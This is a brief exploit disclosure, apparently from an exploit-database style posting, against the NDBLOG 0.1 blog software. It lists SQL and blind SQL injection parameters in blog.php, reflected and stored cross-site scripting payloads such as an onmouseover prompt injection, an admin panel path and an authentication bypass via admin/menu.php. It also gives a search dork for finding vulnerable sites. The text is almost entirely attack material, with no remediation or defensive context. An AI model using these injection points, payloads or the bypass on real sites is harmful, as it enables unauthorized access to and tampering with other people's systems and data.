NDBLOG version 0.1 multi Vulnerability ====================================== Author : indoushka Vondor : ALAMARAB2.com Dork : جميع الحقوق محفوظة © - ALAMARAB2.com - NDBLOG v_0.1 ================================================== Sql injection : http://localhost/ND/blog.php?id=85 (inject her) Blind SQL Injection : http://localhost/ND/blog.php?action=delete&id=11 (inject her) Panel = localhost/ND/admin/ Login = http://localhost/ND/login.php Cross site scripting (verified) : URL encoded POST input user was set to 1'"()&% Cross site scripting [stored] (verified) : URL encoded POST input img was set to 1" onmouseover=prompt(976473) bad=" The input is reflected in http://localhost/ND/ The input is reflected inside a tag parameter between double quotes. by Pass : http://localhost/ND/admin/menu.php